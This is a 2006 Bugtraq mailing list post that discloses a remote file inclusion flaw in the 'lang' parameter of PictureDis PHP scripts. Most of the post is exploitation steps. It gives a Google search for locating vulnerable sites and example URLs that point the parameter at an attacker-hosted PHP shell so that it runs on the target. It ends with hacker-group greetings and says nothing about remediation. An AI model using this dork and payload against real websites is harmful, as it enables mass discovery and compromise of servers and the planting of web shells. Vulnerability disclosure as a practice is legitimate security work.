Bugtraq mailing list archives
PictureDis Products "lang" Parameter File Inclusion Vulnerability
From: root-hacked () hotmail com
Date: 15 Jun 2006 20:41:55 -0000
************************************************************************************************** PictureDis Products "lang" Parameter File Inclusion Vulnerability ================================================= Input passed to the "lang" parameter in thumstbl.php, wpfiles.php, and wallpapr.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files. ********************************************************************************************* exploit: in google search: inurl:thumstbl.php and add the phpshell thumstbl.php?lang=[ur phpshell ] wpfiles.php?lang=[ur phpshell ] wallpapr.php?lang=[ur phpshell ] ****************************************************************** exemple: http://localhost//album/wpfiles.php?lang=http://your site.com/ur script.txt? ************************************************* by s4mi(rOoT-HacKeD)rOoT-HaCkeD[AT]Hotmail[dot]com ==================================== tanx to ==>SIMO64==>DrAcKaNz==>HaRDoSe==> ************************************************* black spell te4m [15-06-2006] end (-: *************************************************
Current thread:
- PictureDis Products "lang" Parameter File Inclusion Vulnerability root-hacked (Jun 16)